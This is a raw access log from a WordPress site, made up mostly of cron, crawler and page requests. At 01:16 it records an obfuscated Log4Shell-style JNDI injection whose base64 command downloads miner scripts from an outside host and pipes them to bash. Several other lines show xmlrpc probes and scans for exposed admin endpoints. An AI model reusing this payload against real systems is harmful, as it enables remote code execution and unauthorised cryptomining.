File: //home/logs/cqqizhou_access_2025-09-14.log
36.133.115.36 - - [14/Sep/2025:00:01:43 +0800] "POST /wp-cron.php?doing_wp_cron=1757779303.8824970722198486328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.22.159.190 - - [14/Sep/2025:00:01:43 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.4"
220.181.108.168 - - [14/Sep/2025:00:11:08 +0800] "GET /wp-content/uploads/2025/07/1750649189-qizhou1920x1080_4.webp HTTP/1.1" 200 174962 "-" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)"
116.179.32.242 - - [14/Sep/2025:00:11:08 +0800] "GET /wp-content/uploads/2025/07/1750649215-qizhou1920x1080_11.webp HTTP/1.1" 200 171642 "-" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)"
36.133.115.36 - - [14/Sep/2025:00:17:59 +0800] "POST /wp-cron.php?doing_wp_cron=1757780278.9987449645996093750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [14/Sep/2025:00:17:59 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:00:21:19 +0800] "POST /wp-cron.php?doing_wp_cron=1757780479.5532488822937011718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:00:21:19 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:00:25:38 +0800] "POST /wp-cron.php?doing_wp_cron=1757780738.0315039157867431640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:00:25:38 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.236.101.210 - - [14/Sep/2025:00:26:05 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [14/Sep/2025:00:36:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757781376.6255431175231933593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.84.253 - - [14/Sep/2025:00:36:17 +0800] "GET / HTTP/1.0" 200 151897 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [14/Sep/2025:00:37:30 +0800] "POST /wp-cron.php?doing_wp_cron=1757781450.5396499633789062500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
199.45.154.118 - - [14/Sep/2025:00:37:30 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.118 - - [14/Sep/2025:00:37:54 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [14/Sep/2025:00:42:02 +0800] "POST /wp-cron.php?doing_wp_cron=1757781722.9379398822784423828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [14/Sep/2025:00:42:22 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [14/Sep/2025:00:44:34 +0800] "POST /wp-cron.php?doing_wp_cron=1757781874.1035649776458740234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
194.163.158.166 - - [14/Sep/2025:00:44:34 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
42.236.101.196 - - [14/Sep/2025:00:48:59 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [14/Sep/2025:00:52:47 +0800] "POST /wp-cron.php?doing_wp_cron=1757782367.4837260246276855468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:00:52:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:01:16:08 +0800] "POST /wp-cron.php?doing_wp_cron=1757783768.2177929878234863281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:01:16:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.75.212.83 - - [14/Sep/2025:01:16:28 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')"
80.75.212.83 - - [14/Sep/2025:01:16:29 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')"
36.133.115.36 - - [14/Sep/2025:01:17:27 +0800] "POST /wp-cron.php?doing_wp_cron=1757783847.6438310146331787109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
64.227.127.68 - - [14/Sep/2025:01:17:27 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
64.227.127.68 - - [14/Sep/2025:01:17:28 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
64.227.127.68 - - [14/Sep/2025:01:17:28 +0800] "GET /odinhttpcall1757783847 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.127.68 - - [14/Sep/2025:01:17:30 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.127.68 - - [14/Sep/2025:01:17:31 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.127.68 - - [14/Sep/2025:01:17:34 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
64.227.127.68 - - [14/Sep/2025:01:17:34 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.127.68 - - [14/Sep/2025:01:17:36 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
64.226.106.108 - - [14/Sep/2025:01:17:37 +0800] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
46.101.96.186 - - [14/Sep/2025:01:17:37 +0800] "GET /solr/admin/info/system HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
157.230.113.31 - - [14/Sep/2025:01:17:38 +0800] "GET /v2/_catalog HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
157.230.113.31 - - [14/Sep/2025:01:17:38 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.96.186 - - [14/Sep/2025:01:17:38 +0800] "GET /solr/admin/info/system HTTP/1.1" 404 31381 "http://36.133.115.36:80/solr/admin/info/system" "Go-http-client/1.1"
64.226.106.108 - - [14/Sep/2025:01:17:38 +0800] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 31381 "http://36.133.115.36:80/query?q=SHOW+DIAGNOSTICS" "Go-http-client/1.1"
157.230.113.31 - - [14/Sep/2025:01:17:39 +0800] "GET /v2/_catalog HTTP/1.1" 404 31381 "http://36.133.115.36:80/v2/_catalog" "Go-http-client/1.1"
157.230.113.31 - - [14/Sep/2025:01:17:40 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.96.186 - - [14/Sep/2025:01:17:40 +0800] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
46.101.96.186 - - [14/Sep/2025:01:17:41 +0800] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 31381 "http://36.133.115.36:80/solr/admin/cores?action=STATUS&wt=json" "Go-http-client/1.1"
36.133.115.36 - - [14/Sep/2025:01:20:31 +0800] "POST /wp-cron.php?doing_wp_cron=1757784031.5820751190185546875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
54.175.246.202 - - [14/Sep/2025:01:20:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [14/Sep/2025:01:25:48 +0800] "POST /wp-cron.php?doing_wp_cron=1757784348.5328240394592285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:01:25:48 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.253.155.235 - - [14/Sep/2025:01:26:04 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:96.0) Gecko/20071914 Firefox/96.0"
36.133.115.36 - - [14/Sep/2025:01:39:41 +0800] "POST /wp-cron.php?doing_wp_cron=1757785181.4841079711914062500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [14/Sep/2025:01:39:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:01:41:24 +0800] "POST /wp-cron.php?doing_wp_cron=1757785284.3707730770111083984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [14/Sep/2025:01:41:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [14/Sep/2025:01:42:42 +0800] "POST /wp-cron.php?doing_wp_cron=1757785362.5726029872894287109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:01:42:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:01:47:00 +0800] "POST /wp-cron.php?doing_wp_cron=1757785620.7237780094146728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.65.194.61 - - [14/Sep/2025:01:47:00 +0800] "GET /portal/redlion HTTP/1.1" 404 8988 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [14/Sep/2025:02:08:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757786905.8851139545440673828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:02:08:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:02:09:31 +0800] "POST /wp-cron.php?doing_wp_cron=1757786971.4340040683746337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.42.117.165 - - [14/Sep/2025:02:09:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [14/Sep/2025:02:24:37 +0800] "POST /wp-cron.php?doing_wp_cron=1757787877.4641590118408203125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.102.7 - - [14/Sep/2025:02:24:37 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.102.7 - - [14/Sep/2025:02:24:39 +0800] "GET / HTTP/1.1" 200 33465 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:02:26:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757787972.3835461139678955078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [14/Sep/2025:02:26:31 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [14/Sep/2025:02:31:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757788306.0030610561370849609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:02:31:46 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:02:33:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757788390.1221780776977539062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:02:33:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:02:39:42 +0800] "POST /wp-cron.php?doing_wp_cron=1757788782.3408269882202148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.122.30 - - [14/Sep/2025:02:39:42 +0800] "GET /services/ HTTP/1.1" 200 19769 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:02:40:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757788812.7882699966430664062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.12 - - [14/Sep/2025:02:40:12 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.10 - - [14/Sep/2025:02:40:13 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [14/Sep/2025:02:46:14 +0800] "POST /wp-cron.php?doing_wp_cron=1757789174.0073940753936767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.237.177.222 - - [14/Sep/2025:02:46:14 +0800] "GET http://passport.baidu.com/ HTTP/1.1" 200 33466 "-" "-"
36.133.115.36 - - [14/Sep/2025:02:47:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757789235.1515879631042480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [14/Sep/2025:02:47:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:02:49:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757789356.8478400707244873046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.245.120 - - [14/Sep/2025:02:49:17 +0800] "GET /contacts/ HTTP/1.1" 200 18529 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:02:50:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757789446.2728540897369384765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
193.164.17.45 - - [14/Sep/2025:02:50:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [14/Sep/2025:02:57:26 +0800] "POST /wp-cron.php?doing_wp_cron=1757789846.6537940502166748046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:02:57:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:03:01:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757790083.4905190467834472656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [14/Sep/2025:03:01:23 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:03:02:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757790124.6206340789794921875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
101.32.49.171 - - [14/Sep/2025:03:02:04 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.244.36.140 - - [14/Sep/2025:03:02:40 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.3"
185.244.36.140 - - [14/Sep/2025:03:02:42 +0800] "GET / HTTP/1.1" 200 39369 "-" "python-requests/2.32.3"
36.133.115.36 - - [14/Sep/2025:03:07:32 +0800] "POST /wp-cron.php?doing_wp_cron=1757790452.2260119915008544921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.36.110 - - [14/Sep/2025:03:07:32 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.36.110 - - [14/Sep/2025:03:07:35 +0800] "GET /services/ HTTP/1.1" 200 19769 "http://cqqizhou.com/services" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:03:11:18 +0800] "POST /wp-cron.php?doing_wp_cron=1757790678.2633149623870849609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [14/Sep/2025:03:11:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
115.159.33.43 - - [14/Sep/2025:03:11:18 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
115.159.33.43 - - [14/Sep/2025:03:11:19 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
115.159.33.43 - - [14/Sep/2025:03:11:19 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [14/Sep/2025:03:19:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757791150.5130879878997802734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.156.109.53 - - [14/Sep/2025:03:19:10 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840 HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:03:22:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757791333.9273650646209716796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:03:22:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:03:27:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757791645.3799109458923339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:03:27:25 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:03:28:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757791696.8138999938964843750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.167.239.66 - - [14/Sep/2025:03:28:16 +0800] "GET /wp-content/uploads/2025/07/1753456723- HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
20.80.72.203 - - [14/Sep/2025:03:28:40 +0800] "GET /actuator/health HTTP/1.1" 404 8988 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [14/Sep/2025:03:43:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757792625.5885670185089111328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.131.36.84 - - [14/Sep/2025:03:43:45 +0800] "GET /news/ HTTP/1.1" 200 19426 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:03:46:27 +0800] "POST /wp-cron.php?doing_wp_cron=1757792787.2022840976715087890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:03:46:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:03:47:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757792841.9036660194396972656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.121 - - [14/Sep/2025:03:47:21 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
